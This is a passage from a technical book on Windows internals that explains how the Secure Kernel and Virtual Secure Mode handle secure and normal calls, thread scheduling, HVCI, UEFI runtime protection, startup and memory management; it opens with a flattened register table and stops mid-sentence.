h
a
r
e
d
Rax, Rbx,
Rcx, Rdx,
Rsi, Rdi,
Rbp
CR2
R8 – R15
DR0 – DR5
X87
floating
point state
XMM
registers
AVX
registers
HV_X64_MSR_TSC_FREQUENCY
HV_X64_MSR_VP_INDEX
HV_X64_MSR_VP_RUNTIME
HV_X64_MSR_RESET
HV_X64_MSR_TIME_REF_COUNT
HV_X64_MSR_GUEST_IDLE
HV_X64_MSR_DEBUG_DEVICE_OPTIONS
HV_X64_MSR_BELOW_1MB_PAGE
HV_X64_MSR_STATS_PARTITION_RETAIL_PA
GE
HV_X64_MSR_STATS_VP_RETAIL_PAGE
XCR0
(XFEM)
DR6
(processor-
dependent)
MTRR’s and PAT
MCG_CAP
MCG_STATUS
P
ri
v
a
t
e
RIP, RSP
RFLAGS
CR0, CR3,
CR4
DR7
IDTR,
GDTR
CS, DS,
ES, FS, GS,
SS, TR,
LDTR
TSC
DR6
(processor-
dependent)
SYSENTER_CS, SYSENTER_ESP,
SYSENTER_EIP, STAR, LSTAR, CSTAR,
SFMASK, EFER, KERNEL_GSBASE, FS.BASE,
GS.BASE
HV_X64_MSR_HYPERCALL
HV_X64_MSR_GUEST_OS_ID
HV_X64_MSR_REFERENCE_TSC
HV_X64_MSR_APIC_FREQUENCY
HV_X64_MSR_EOI
HV_X64_MSR_ICR
HV_X64_MSR_TPR
HV_X64_MSR_APIC_ASSIST_PAGE
HV_X64_MSR_NPIEP_CONFIG
HV_X64_MSR_SIRBP
HV_X64_MSR_SCONTROL
HV_X64_MSR_SVERSION
HV_X64_MSR_SIEFP
HV_X64_MSR_SIMP
HV_X64_MSR_EOM
HV_X64_MSR_SINT0 – HV_X64_MSR_SINT15
HV_X64_MSR_STIMER0_CONFIG –
HV_X64_MSR_STIMER3_CONFIG
HV_X64_MSR_STIMER0_COUNT -
HV_X64_MSR_STIMER3_COUNT
Local APIC registers (including CR8/TPR)
Secure calls
When the NT kernel needs services provided by the Secure Kernel, it uses a
special function, VslpEnterIumSecureMode. The routine accepts a 104-byte
data structure (called SKCALL), which is used to describe the kind of
operation (invoke service, flush TB, resume thread, or call enclave), the
secure call number, and a maximum of twelve 8-byte parameters. The
function raises the processor’s IRQL, if necessary, and determines the value
of the Secure Thread cookie. This value communicates to the Secure Kernel
which secure thread will process the request. It then (re)starts the secure calls
dispatch loop. The executability state of each VTL is a state machine that
depends on the other VTL.
The loop described by the VslpEnterIumSecureMode function manages all
the operations shown on the left side of Figure 9-33 in VTL 0 (except the
case of Secure Interrupts). The NT kernel can decide to enter the Secure
Kernel, and the Secure Kernel can decide to enter the normal NT kernel. The
loop starts by entering the Secure Kernel through the HvlSwitchToVsmVtl1
routine (specifying the operation requested by the caller). The latter function,
which returns only if the Secure Kernel requests a VTL switch, saves all the
shared registers and copies the entire SKCALL data structure in some well-
defined CPU registers: RBX and the SSE registers XMM10 through
XMM15. Finally, it emits an HvVtlCall hypercall to the hypervisor. The
hypervisor switches to the target VTL (by loading the saved per-VTL
VMCS) and writes a VTL secure call entry reason to the VTL control page.
Indeed, to be able to determine why a secure VTL was entered, the
hypervisor maintains an informational memory page that is shared by each
secure VTL. This page is used for bidirectional communication between the
hypervisor and the code running in a secure VTL on a virtual processor.
Figure 9-33 The VSM dispatch loop.
The virtual processor restarts the execution in VTL 1 context, in the
SkCallNormalMode function of the Secure Kernel. The code reads the VTL
entry reason; if it’s not a Secure Interrupt, it loads the current processor
SKPRCB (Secure Kernel processor control block), selects a thread on which
to run (starting from the secure thread cookie), and copies the content of the
SKCALL data structure from the CPU shared registers to a memory buffer.
Finally, it calls the IumInvokeSecureService dispatcher routine, which will
process the requested secure call, by dispatching the call to the correct
function (and implements part of the dispatch loop in VTL 1).
An important concept to understand is that the Secure Kernel can map and
access VTL 0 memory, so there’s no need to marshal and copy any eventual
data structure, pointed by one or more parameters, to the VTL 1 memory.
This concept won’t apply to a normal call, as we will discuss in the next
section.
As we have seen in the previous section, Secure Interrupts (and intercepts)
are dispatched by the hypervisor, which preempts any code executing in VTL
0. In this case, when the VTL 1 code starts the execution, it dispatches the
interrupt to the right ISR. After the ISR finishes, the Secure Kernel
immediately emits a HvVtlReturn hypercall. As a result, the code in VTL 0
restarts the execution at the point in which it has been previously interrupted,
which is not located in the secure calls dispatch loop. Therefore, Secure
Interrupts are not part of the dispatch loop even if they still produce a VTL
switch.
Normal calls
Normal calls are managed similarly to the secure calls (with an analogous
dispatch loop located in VTL 1, called normal calls loop), but with some
important differences:
■ All the shared VTL registers are securely cleaned up by the Secure
Kernel before emitting the HvVtlReturn to the hypervisor for
switching the VTL. This prevents leaking any kind of secure data to
normal mode.
■ The normal NT kernel can’t read secure VTL 1 memory. For
correctly passing the syscall parameters and data structures needed for
the normal call, a memory buffer that both the Secure Kernel and the
normal kernel can share is required. The Secure Kernel allocates this
shared buffer using the ALLOCATE_VM normal call (which does not
require passing any pointer as a parameter). The latter is dispatched to
the MmAllocateVirtualMemory function in the NT normal kernel. The
allocated memory is remapped in the Secure Kernel at the same
virtual address and has become part of the Secure process’s shared
memory pool.
■ As we will discuss later in the chapter, the Isolated User Mode (IUM)
was originally designed to be able to execute special Win32
executables, which should have been capable of running indifferently
in the normal world or in the secure world. The standard unmodified
Ntdll.dll and KernelBase.dll libraries are mapped even in IUM. This
fact has the important consequence of requiring almost all the native
NT APIs (which Kernel32.dll and many other user mode libraries
depend on) to be proxied by the Secure Kernel.
To correctly deal with the described problems, the Secure Kernel includes
a marshaler, which identifies and correctly copies the data structures pointed
by the parameters of an NT API in the shared buffer. The marshaler is also
able to determine the size of the shared buffer, which will be allocated from
the secure process memory pool. The Secure Kernel defines three types of
normal calls:
■ A disabled normal call is not implemented in the Secure Kernel and,
if called from IUM, it simply fails with a
STATUS_INVALID_SYSTEM_SERVICE exit code. This kind of call
can’t be called directly by the Secure Kernel itself.
■ An enabled normal call is implemented only in the NT kernel and is
callable from IUM in its original Nt or Zw version (through Ntdll.dll).
Even the Secure Kernel can request an enabled normal call—but only
through a little stub code that loads the normal call number—set the
highest bit in the number, and call the normal call dispatcher
(IumGenericSyscall routine). The highest bit identifies the normal call
as required by the Secure Kernel itself and not by the Ntdll.dll module
loaded in IUM.
■ A special normal call is implemented partially or completely in
Secure Kernel (VTL 1), which can filter the original function’s results
or entirely redesign its code.
Enabled and special normal calls can be marked as KernelOnly. In the
latter case, the normal call can be requested only from the Secure Kernel
itself (and not from secure processes). We’ve already provided the list of
enabled and special normal calls (which are callable from software running
in VSM) in Chapter 3 of Part 1, in the section named “Trustlet-accessible
system calls.”
Figure 9-34 shows an example of a special normal call. In the example, the
LsaIso trustlet has called the NtQueryInformationProcess native API to
request information of a particular process. The Ntdll.dll mapped in IUM
prepares the syscall number and executes a SYSCALL instruction, which
transfers the execution flow to the KiSystemServiceStart global system call
dispatcher, residing in the Secure Kernel (VTL 1). The global system call
dispatcher recognizes that the system call number belongs to a normal call
and uses the number to access the IumSyscallDispatchTable array, which
represents the normal calls dispatch table.
Figure 9-34 A trustlet performing a special normal call to the
NtQueryInformationProcess API.
The normal calls dispatch table contains an array of compacted entries,
which are generated in phase 0 of the Secure Kernel startup (discussed later
in this chapter). Each entry contains an offset to a target function (calculated
relative to the table itself) and the number of its arguments (with some flags).
All the offsets in the table are initially calculated to point to the normal call
dispatcher routine (IumGenericSyscall). After the first initialization cycle, the
Secure Kernel startup routine patches each entry that represents a special call.
The new offset is pointed to the part of code that implements the normal call
in the Secure Kernel.
As a result, in Figure 9-34, the global system calls dispatcher transfers
execution to the NtQueryInformationProcess function’s part implemented in
the Secure Kernel. The latter checks whether the requested information class
is one of the small subsets exposed to the Secure Kernel and, if so, uses a
small stub code to call the normal call dispatcher routine
(IumGenericSyscall).
Figure 9-35 shows the syscall selector number for the
NtQueryInformationProcess API. Note that the stub sets the highest bit (N
bit) of the syscall number to indicate that the normal call is requested by the
Secure Kernel. The normal call dispatcher checks the parameters and calls
the marshaler, which is able to marshal each argument and copy it in the right
offset of the shared buffer. There is another bit in the selector that further
differentiates between a normal call or a secure system call, which is
discussed later in this chapter.
Figure 9-35 The Syscall selector number of the Secure Kernel.
The marshaler works thanks to two important arrays that describe each
normal call: the descriptors array (shown in the right side of Figure 9-34) and
the arguments descriptors array. From these arrays, the marshaler can fetch
all the information that it needs: normal call type, marshalling function index,
argument type, size, and type of data pointed to (if the argument is a pointer).
After the shared buffer has been correctly filled by the marshaler, the
Secure Kernel compiles the SKCALL data structure and enters the normal call
dispatcher loop (SkCallNormalMode). This part of the loop saves and clears
all the shared virtual CPU registers, disables interrupts, and moves the thread
context to the PRCB thread (more about thread scheduling later in the
chapter). It then copies the content of the SKCALL data structure in some
shared register. As a final stage, it calls the hypervisor through the
HvVtlReturn hypercall.
Then the code execution resumes in the secure call dispatch loop in VTL
0. If there are some pending interrupts in the queue, they are processed as
normal (only if the IRQL allows it). The loop recognizes the normal call
operation request and calls the NtQueryInformationProcess function
implemented in VTL 0. After the latter function finished its processing, the
loop restarts and reenters the Secure Kernel again (as for Secure Calls), still
through the HvlSwitchToVsmVtl1 routine, but with a different operation
request: Resume thread. This, as the name implies, allows the Secure Kernel
to switch to the original secure thread and to continue the execution that has
been preempted for executing the normal call.
The implementation of enabled normal calls is the same except for the fact
that those calls have their entries in the normal calls dispatch table, which
point directly to the normal call dispatcher routine, IumGenericSyscall. In
this way, the code will transfer directly to the handler, skipping any API
implementation code in the Secure Kernel.
Secure system calls
The last type of system calls available in the Secure Kernel is similar to
standard system calls provided by the NT kernel to VTL 0 user mode
software. The secure system calls are used for providing services only to the
secure processes (trustlets). VTL 0 software can’t emit secure system calls in
any way. As we will discuss in the “Isolated User Mode” section later in this
chapter, every trustlet maps the IUM Native Layer Dll (Iumdll.dll) in its
address space. Iumdll.dll has the same job as its counterpart in VTL 0,
Ntdll.dll: implement the native syscall stub functions for user mode
application. The stub copies the syscall number in a register and emits the
SYSCALL instruction (the instruction uses different opcodes depending on
the platform).
Secure system calls numbers always have the twenty-eighth bit set to 1 (on
AMD64 architectures, whereas ARM64 uses the sixteenth bit). In this way,
the global system call dispatcher (KiSystemServiceStart) recognizes that the
syscall number belongs to a secure system call (and not a normal call) and
switches to the SkiSecureServiceTable, which represents the secure system
calls dispatch table. As in the case of normal calls, the global dispatcher
verifies that the call number is in the limit, allocates stack space for the
arguments (if needed), calculates the system call final address, and transfers
the code execution to it.
Overall, the code execution remains in VTL 1, but the current privilege
level of the virtual processor raises from 3 (user mode) to 0 (kernel mode).
The dispatch table for secure system calls is compacted—similarly to the
normal calls dispatch table—at phase 0 of the Secure Kernel startup.
However, entries in this table are all valid and point to functions
implemented in the Secure Kernel.
Secure threads and scheduling
As we will describe in the “Isolated User Mode” section, the execution units
in VSM are the secure threads, which live in the address space described by a
secure process. Secure threads can be kernel mode or user mode threads.
VSM maintains a strict correspondence between each user mode secure
thread and normal thread living in VTL 0.
Indeed, the Secure Kernel thread scheduling depends completely on the
normal NT kernel; the Secure Kernel doesn’t include a proprietary scheduler
(by design, the Secure Kernel attack surface needs to be small). In Chapter 3
of Part 1, we described how the NT kernel creates a process and the relative
initial thread. In the section that describes Stage 4, “Creating the initial thread
and its stack and context,” we explain that a thread creation is performed in
two parts:
■ The executive thread object is created; its kernel and user stack are
allocated. The KeInitThread routine is called for setting up the initial
thread context for user mode threads. KiStartUserThread is the first
routine that will be executed in the context of the new thread, which
will lower the thread’s IRQL and call PspUserThreadStartup.
■ The execution control is then returned to NtCreateUserProcess,
which, at a later stage, calls PspInsertThread to complete the
initialization of the thread and insert it into the object manager
namespace.
As a part of its work, when PspInsertThread detects that the thread
belongs to a secure process, it calls VslCreateSecureThread, which, as the
name implies, uses the Create Thread secure service call to ask to the Secure
Kernel to create an associated secure thread. The Secure Kernel verifies the
parameters and gets the process’s secure image data structure (more details
about this later in this chapter). It then allocates the secure thread object and
its TEB, creates the initial thread context (the first routine that will run is
SkpUserThreadStartup), and finally makes the thread schedulable.
Furthermore, the secure service handler in VTL 1, after marking the thread as
ready to run, returns a specific thread cookie, which is stored in the
ETHREAD data structure.
The new secure thread still starts in VTL 0. As described in the “Stage 7”
section of Chapter 3 of Part 1, PspUserThreadStartup performs the final
initialization of the user thread in the new context. In case it determines that
the thread’s owning process is a trustlet, PspUserThreadStartup calls the
VslStartSecureThread function, which invokes the secure calls dispatch loop
through the VslpEnterIumSecureMode routine in VTL 0 (passing the secure
thread cookie returned by the Create Thread secure service handler). The first
operation that the dispatch loop requests to the Secure Kernel is to resume
the execution of the secure thread (still through the HvVtlCall hypercall).
The Secure Kernel, before the switch to VTL 0, was executing code in the
normal call dispatcher loop (SkCallNormalMode). The hypercall executed by
the normal kernel restarts the execution in the same loop routine. The VTL 1
dispatcher loop recognizes the new thread resume request; it switches its
execution context to the new secure thread, attaches to its address spaces, and
makes it runnable. As part of the context switching, a new stack is selected
(which has been previously initialized by the Create Thread secure call). The
latter contains the address of the first secure thread system function,
SkpUserThreadStartup, which, similarly to the case of normal NT threads,
sets up the initial thunk context to run the image-loader initialization routine
(LdrInitializeThunk in Ntdll.dll).
After it has started, the new secure thread can return to normal mode for
two main reasons: it emits a normal call, which needs to be processed in VTL
0, or the VINA interrupts preempt the code execution. Even though the two
cases are processed in a slightly different way, they both result in executing
the normal call dispatcher loop (SkCallNormalMode).
As previously discussed in Part 1, Chapter 4, “Threads,” the NT scheduler
works thanks to the processor clock, which generates an interrupt every time
the system clock fires (usually every 15.6 milliseconds). The clock interrupt
service routine updates the processor times and calculates whether the thread
quantum expires. The interrupt is targeted to VTL 0, so, when the virtual
processor is executing code in VTL 1, the hypervisor injects a VINA
interrupt to the Secure Kernel, as shown in Figure 9-36. The VINA interrupt
preempts the current executing code, lowers the IRQL to the previous
preempted code’s IRQL value, and emits the VINA normal call for entering
VTL 0.
Figure 9-36 Secure threads scheduling scheme.
As the standard process of normal call dispatching, before the Secure
Kernel emits the HvVtlReturn hypercall, it deselects the current execution
thread from the virtual processor’s PRCB. This is important: The VP in VTL
1 is not tied to any thread context anymore and, on the next loop cycle, the
Secure Kernel can switch to a different thread or decide to reschedule the
execution of the current one.
After the VTL switch, the NT kernel resumes the execution in the secure
calls dispatch loop and still in the context of the new thread. Before it has any
chance to execute any code, the code is preempted by the clock interrupt
service routine, which can calculate the new quantum value and, if the latter
has expired, switch the execution of another thread. When a context switch
occurs, and another thread enters VTL 1, the normal call dispatch loop
schedules a different secure thread depending on the value of the secure
thread cookie:
■ A secure thread from the secure thread pool if the normal NT kernel
has entered VTL 1 for dispatching a secure call (in this case, the
secure thread cookie is 0).
■ The newly created secure thread if the thread has been rescheduled for
execution (the secure thread cookie is a valid value). As shown in
Figure 9-36, the new thread can be also rescheduled by another virtual
processor (VP 3 in the example).
With the described schema, all the scheduling decisions are performed
only in VTL 0. The secure call loop and normal call loops cooperate to
correctly switch the secure thread context in VTL 1. All the secure threads
have an associated a thread in the normal kernel. The opposite is not true,
though; if a normal thread in VTL 0 decides to emit a secure call, the Secure
Kernel dispatches the request by using an arbitrary thread context from a
thread pool.
The Hypervisor Enforced Code Integrity
Hypervisor Enforced Code Integrity (HVCI) is the feature that powers Device
Guard and provides the W^X (pronounced double-you xor ex) characteristic
of the VTL 0 kernel memory. The NT kernel can’t map and executes any
kind of executable memory in kernel mode without the aid of the Secure
Kernel. The Secure Kernel allows only proper digitally signed drivers to run
in the machine’s kernel. As we discuss in the next section, the Secure Kernel
keeps track of every virtual page allocated in the normal NT kernel; memory
pages marked as executable in the NT kernel are considered privileged pages.
Only the Secure Kernel can write to them after the SKCI module has
correctly verified their content.
You can read more about HVCI in Chapter 7 of Part 1, in the “Device
Guard” and “Credential Guard” sections.
UEFI runtime virtualization
Another service provided by the Secure Kernel (when HVCI is enabled) is
the ability to virtualize and protect the UEFI runtime services. As we discuss
in Chapter 12, the UEFI firmware services are mainly implemented by using
a big table of function pointers. Part of the table will be deleted from memory
after the OS takes control and calls the ExitBootServices function, but another
part of the table, which represents the Runtime services, will remain mapped
even after the OS has already taken full control of the machine. Indeed, this is
necessary because sometimes the OS needs to interact with the UEFI
configuration and services.
Every hardware vendor implements its own UEFI firmware. With HVCI,
the firmware should cooperate to provide the nonwritable state of each of its
executable memory pages (no firmware page can be mapped in VTL 0 with
read, write, and execute state). The memory range in which the UEFI
firmware resides is described by multiple MEMORY_DESCRIPTOR data
structures located in the EFI memory map. The Windows Loader parses this
data with the goal to properly protect the UEFI firmware’s memory.
Unfortunately, in the original implementation of UEFI, the code and data
were stored mixed in a single section (or multiple sections) and were
described by relative memory descriptors. Furthermore, some device drivers
read or write configuration data directly from the UEFI’s memory regions.
This clearly was not compatible with HVCI.
For overcoming this problem, the Secure Kernel employs the following
two strategies:
■ New versions of the UEFI firmware (which adhere to UEFI 2.6 and
higher specifications) maintain a new configuration table (linked in
the boot services table), called memory attribute table (MAT). The
MAT defines fine-grained sections of the UEFI Memory region,
which are subsections of the memory descriptors defined by the EFI
memory map. Each section never has both the executable and writable
protection attribute.
■ For old firmware, the Secure Kernel maps in VTL 0 the entire UEFI
firmware region’s physical memory with a read-only access right.
In the first strategy, at boot time, the Windows Loader merges the
information found both in the EFI memory map and in the MAT, creating an
array of memory descriptors that precisely describe the entire firmware
region. It then copies them in a reserved buffer located in VTL 1 (used in the
hibernation path) and verifies that each firmware’s section doesn’t violate the
W^X assumption. If so, when the Secure Kernel starts, it applies a proper
SLAT protection for every page that belongs to the underlying UEFI
firmware region. The physical pages are protected by the SLAT, but their
virtual address space in VTL 0 is still entirely marked as RWX. Keeping the
virtual memory’s RWX protection is important because the Secure Kernel
must support resume-from-hibernation in a scenario where the protection
applied in the MAT entries can change. Furthermore, this maintains the
compatibility with older drivers, which read or write directly from the UEFI
memory region, assuming that the write is performed in the correct sections.
(Also, the UEFI code should be able to write in its own memory, which is
mapped in VTL 0.) This strategy allows the Secure Kernel to avoid mapping
any firmware code in VTL 1; the only part of the firmware that remains in
VTL 1 is the Runtime function table itself. Keeping the table in VTL 1
allows the resume-from-hibernation code to update the UEFI runtime
services’ function pointer directly.
The second strategy is not optimal and is used only for allowing old
systems to run with HVCI enabled. When the Secure Kernel doesn’t find any
MAT in the firmware, it has no choice except to map the entire UEFI runtime
services code in VTL 1. Historically, multiple bugs have been discovered in
the UEFI firmware code (in SMM especially). Mapping the firmware in VTL
1 could be dangerous, but it’s the only solution compatible with HVCI. (New
systems, as stated before, never map any UEFI firmware code in VTL 1.) At
startup time, the NT Hal detects that HVCI is on and that the firmware is
entirely mapped in VTL 1. So, it switches its internal EFI service table’s
pointer to a new table, called UEFI wrapper table. Entries of the wrapper
table contain stub routines that use the INVOKE_EFI_RUNTIME_SERVICE
secure call to enter in VTL 1. The Secure Kernel marshals the parameters,
executes the firmware call, and yields the results to VTL 0. In this case, all
the physical memory that describes the entire UEFI firmware is still mapped
in read-only mode in VTL 0. The goal is to allow drivers to correctly read
information from the UEFI firmware memory region (like ACPI tables, for
example). Old drivers that directly write into UEFI memory regions are not
compatible with HVCI in this scenario.
When the Secure Kernel resumes from hibernation, it updates the in-
memory UEFI service table to point to the new services’ location.
Furthermore, in systems that have the new UEFI firmware, the Secure Kernel
reapplies the SLAT protection on each memory region mapped in VTL 0 (the
Windows Loader is able to change the regions’ virtual addresses if needed).
VSM startup
Although we describe the entire Windows startup and shutdown mechanism
in Chapter 12, this section describes the way in which the Secure Kernel and
all the VSM infrastructure is started. The Secure Kernel is dependent on the
hypervisor, the Windows Loader, and the NT kernel to properly start up. We
discuss the Windows Loader, the hypervisor loader, and the preliminary
phases by which the Secure Kernel is initialized in VTL 0 by these two
modules in Chapter 12. In this section, we focus on the VSM startup method,
which is implemented in the securekernel.exe binary.
The first code executed by the securekernel.exe binary is still running in
VTL 0; the hypervisor already has been started, and the page tables used for
VTL 1 have been built. The Secure Kernel initializes the following
components in VTL 0:
■ The memory manager’s initialization function stores the PFN of the
VTL 0 root-level page-level structure, saves the code integrity data,
and enables HVCI, MBEC (Mode-Based Execution Control), kernel
CFG, and hot patching.
■ Shared architecture-specific CPU components, like the GDT and IDT.
■ Normal calls and secure system calls dispatch tables (initialization
and compaction).
■ The boot processor. The process of starting the boot processor
requires the Secure Kernel to allocate its kernel and interrupt stacks;
initialize the architecture-specific components, which can’t be shared
between different processors (like the TSS); and finally allocate the
processor’s SKPRCB. The latter is an important data structure, which,
like the PRCB data structure in VTL 0, is used to store important
information associated to each CPU.
The Secure Kernel initialization code is ready to enter VTL 1 for the first
time. The hypervisor subsystem initialization function (ShvlInitSystem
routine) connects to the hypervisor (through the hypervisor CPUID classes;
see the previous section for more details) and checks the supported
enlightenments. Then it saves the VTL 1’s page table (previously created by
the Windows Loader) and the allocated hypercall pages (used for holding
hypercall parameters). It finally initializes and enters VTL 1 in the following
way:
1.
Enables VTL 1 for the current hypervisor partition through the
HvEnablePartitionVtl hypercall. The hypervisor copies the existing
SLAT table of normal VTL to VTL 1 and enables MBEC and the new
VTL 1 for the partition.
2.
Enables VTL 1 for the boot processor through HvEnableVpVtl
hypercall. The hypervisor initializes a new per-level VMCS data
structure, compiles it, and sets the SLAT table.
3.
Asks the hypervisor for the location of the platform-dependent VtlCall
and VtlReturn hypercall code. The CPU opcodes needed for
performing VSM calls are hidden from the Secure Kernel
implementation. This allows most of the Secure Kernel’s code to be
platform-independent. Finally, the Secure Kernel executes the
transition to VTL 1, through the HvVtlCall hypercall. The hypervisor
loads the VMCS for the new VTL and switches to it (making it
active). This basically renders the new VTL runnable.
The Secure Kernel starts a complex initialization procedure in VTL 1,
which still depends on the Windows Loader and also on the NT kernel. It is
worth noting that, at this stage, VTL 1 memory is still identity-mapped in
VTL 0; the Secure Kernel and its dependent modules are still accessible to
the normal world. After the switch to VTL 1, the Secure Kernel initializes the
boot processor:
1.
Gets the virtual address of the Synthetic Interrupt controller shared
page, TSC, and VP assist page, which are provided by the hypervisor
for sharing data between the hypervisor and VTL 1 code. Maps in
VTL 1 the Hypercall page.
2.
Blocks the possibility for other system virtual processors to be started
by a lower VTL and requests the memory to be zero-filled on reboot
to the hypervisor.
3.
Initializes and fills the boot processor Interrupt Descriptor Table
(IDT). Configures the IPI, callbacks, and secure timer interrupt
handlers and sets the current secure thread as the default SKPRCB
thread.
4.
Starts the VTL 1 secure memory manager, which creates the boot
table mapping and maps the boot loader’s memory in VTL 1, creates
the secure PFN database and system hyperspace, initializes the secure
memory pool support, and reads the VTL 0 loader block to copy the
module descriptors of the Secure Kernel’s imported images (Skci.dll,
Cnf.sys, and Vmsvcext.sys). It finally walks the NT loaded module
list to establish each driver state, creating a NAR (normal address
range) data structure for each one and compiling an Normal Table
Entry (NTE) for every page composing the boot driver’s sections.
Furthermore, the secure memory manager initialization function
applies the correct VTL 0 SLAT protection to each driver’s sections.
5.
Initializes the HAL, the secure threads pool, the process subsystem,
the synthetic APIC, Secure PNP, and Secure PCI.
6.
Applies a read-only VTL 0 SLAT protection for the Secure Kernel
pages, configures MBEC, and enables the VINA virtual interrupt on
the boot processor.
When this part of the initialization ends, the Secure Kernel unmaps the
boot-loaded memory. The secure memory manager, as we discuss in the next
section, depends on the VTL 0 memory manager for being able to allocate
and free VTL 1 memory. VTL 1 does not own any physical memory; at this
stage, it relies on some previously allocated (by the Windows Loader)
physical pages for being able to satisfy memory allocation requests. When
the NT kernel later starts, the Secure Kernel performs normal calls for
requesting memory services to the VTL 0 memory manager. As a result,
some parts of the Secure Kernel initialization must be deferred after the NT
kernel is started. Execution flow returns to the Windows Loader in VTL 0.
The latter loads and starts the NT kernel. The last part of the Secure Kernel
initialization happens in phase 0 and phase 1 of the NT kernel initialization
(see Chapter 12 for further details).
Phase 0 of the NT kernel initialization still has no memory services
available, but this is the last moment in which the Secure Kernel fully trusts
the normal world. Boot-loaded drivers still have not been initialized and the
initial boot process should have been already protected by Secure Boot. The
PHASE3_INIT secure call handler modifies the SLAT protections of all the
physical pages belonging to Secure Kernel and to its depended modules,
rendering them inaccessible to VTL 0. Furthermore, it applies a read-only
protection to the kernel CFG bitmaps. At this stage, the Secure Kernel
enables the support for pagefile integrity, creates the initial system process
and its address space, and saves all the “trusted” values of the shared CPU
registers (like IDT, GDT, Syscall MSR, and so on). The data structures that
the shared registers point to are verified (thanks to the NTE database).
Finally, the secure thread pool is started and the object manager, the secure
code integrity module (Skci.dll), and HyperGuard are initialized (more
details on HyperGuard are available in Chapter 7 of Part 1).
When the execution flow is returned to VTL 0, the NT kernel can then
start all the other application processors (APs). When the Secure Kernel is
enabled, the AP’s initialization happens in a slightly different way (we
discuss AP initialization in the next section).
As part of the phase 1 of the NT kernel initialization, the system starts the
I/O manager. The I/O manager, as discussed in Part 1, Chapter 6, “I/O
system,” is the core of the I/O system and defines the model within which
I/O requests are delivered to device drivers. One of the duties of the I/O
manager is to initialize and start the boot-loaded and ELAM drivers. Before
creating the special sections for mapping the user mode system DLLs, the
I/O manager initialization function emits a PHASE4_INIT secure call to start
the last initialization phase of the Secure Kernel. At this stage, the Secure
Kernel does not trust the VTL 0 anymore, but it can use the services provided
by the NT memory manager. The Secure Kernel initializes the content of the
Secure User Shared data page (which is mapped both in VTL 1 user mode
and kernel mode) and finalizes the executive subsystem initialization. It
reclaims any resources that were reserved during the boot process, calls each
of its own dependent module entry points (in particular, cng.sys and
vmsvcext.sys, which start before any normal boot drivers). It allocates the
necessary resources for the encryption of the hibernation, crash-dump,
paging files, and memory-page integrity. It finally reads and maps the API
set schema file in VTL 1 memory. At this stage, VSM is completely
initialized.
Application processors (APs) startup
One of the security features provided by the Secure Kernel is the startup of
the application processors (APs), which are the ones not used to boot up the
system. When the system starts, the Intel and AMD specifications of the x86
and AMD64 architectures define a precise algorithm that chooses the boot
strap processor (BSP) in multiprocessor systems. The boot processor always
starts in 16-bit real mode (where it’s able to access only 1 MB of physical
memory) and usually executes the machine’s firmware code (UEFI in most
cases), which needs to be located at a specific physical memory location (the
location is called reset vector). The boot processor executes almost all of the
initialization of the OS, hypervisor, and Secure Kernel. For starting other
non-boot processors, the system needs to send a special IPI (inter-processor
interrupt) to the local APICs belonging to each processor. The startup IPI
(SIPI) vector contains the physical memory address of the processor start
block, a block of code that includes the instructions for performing the
following basic operations:
1.
Load a GDT and switch from 16-bit real-mode to 32-bit protected
mode (with no paging enabled).
2.
Set a basic page table, enable paging, and enter 64-bit long mode.
3.
Load the 64-bit IDT and GDT, set the proper processor registers, and
jump to the OS startup function (KiSystemStartup).
This process is vulnerable to malicious attacks. The processor startup code
could be modified by external entities while it is executing on the AP
processor (the NT kernel has no control at this point). In this case, all the
security promises brought by VSM could be easily fooled. When the
hypervisor and the Secure Kernel are enabled, the application processors are
still started by the NT kernel but using the hypervisor.
KeStartAllProcessors, which is the function called by phase 1 of the NT
kernel initialization (see Chapter 12 for more details), with the goal of
starting all the APs, builds a shared IDT and enumerates all the available
processors by consulting the Multiple APIC Description Table (MADT)
ACPI table. For each discovered processor, it allocates memory for the
PRCB and all the private CPU data structures for the kernel and DPC stack.
If the VSM is enabled, it then starts the AP by sending a
START_PROCESSOR secure call to the Secure Kernel. The latter validates
that all the data structures allocated and filled for the new processor are valid,
including the initial values of the processor registers and the startup routine
(KiSystemStartup) and ensures that the APs startups happen sequentially and
only once per processor. It then initializes the VTL 1 data structures needed
for the new application processor (the SKPRCB in particular). The PRCB
thread, which is used for dispatching the Secure Calls in the context of the
new processor, is started, and the VTL 0 CPU data structures are protected
by using the SLAT. The Secure Kernel finally enables VTL 1 for the new
application processor and starts it by using the HvStartVirtualProcessor
hypercall. The hypervisor starts the AP in a similar way described in the
beginning of this section (by sending the startup IPI). In this case, however,
the AP starts its execution in the hypervisor context, switches to 64-bit long
mode execution, and returns to VTL 1.
The first function executed by the application processor resides in VTL 1.
The Secure Kernel’s CPU initialization routine maps the per-processor VP
assist page and SynIC control page, configures MBEC, and enables the
VINA. It then returns to VTL 0 through the HvVtlReturn hypercall. The first
routine executed in VTL 0 is KiSystemStartup, which initializes the data
structures needed by the NT kernel to manage the AP, initializes the HAL,
and jumps to the idle loop (read more details in Chapter 12). The Secure Call
dispatch loop is initialized later by the normal NT kernel when the first
secure call is executed.
An attacker in this case can’t modify the processor startup block or any
initial value of the CPU’s registers and data structures. With the described
secure AP start-up, any modification would have been detected by the Secure
Kernel and the system bug checked to defeat any attack effort.
The Secure Kernel memory manager
The Secure Kernel memory manager heavily depends on the NT memory
manager (and on the Windows Loader memory manager for its startup code).
Entirely describing the Secure Kernel memory manager is outside the scope
of this book. Here we discuss only the most important concepts and data
structures used by the Secure Kernel.
As mentioned in the previous section, the Secure Kernel memory manager
initialization is divided into three phases. In phase 1, the most important, the
memory manager performs the following:
1.
Maps the boot loader firmware memory descriptor list in VTL 1,
scans the list, and determines the first physical page that it can use for
allocating the memory needed for its initial startup (this memory type
is called SLAB). Maps the VTL 0’s page tables in a virtual address
that is located exactly 512 GB before the VTL 1’s page table. This
allows the Secure Kernel to perform a fast conversion between an NT
virtual address and one from the Secure Kernel.
2.
Initializes the PTE range data structures. A PTE range contains a
bitmap that describes each chunk of allocated virtual address range
and helps the Secure Kernel to allocate PTEs for its own address
space.
3.
Creates the Secure PFN database and initializes the Memory pool.
4.
Initializes the sparse NT address table. For each boot-loaded driver, it
creates and fills a NAR, verifies the integrity of the binary, fills the
hot patch information, and, if HVCI is on, protects each executable
section of driver using the SLAT. It then cycles between each PTE of
the memory image and writes an NT Address Table Entry (NTE) in
the NT address table.
5.
Initializes the page bundles.
The Secure Kernel keeps track of the memory that the normal NT kernel
uses. The Secure Kernel memory manager uses the NAR data structure for
describing a kernel virtual address range that contains executable code. The
NAR contains some information of the range (such as its base address and
size) and a pointer to a SECURE_IMAGE data structure, which is used for
describing runtime drivers (in general, images verified using Secure HVCI,
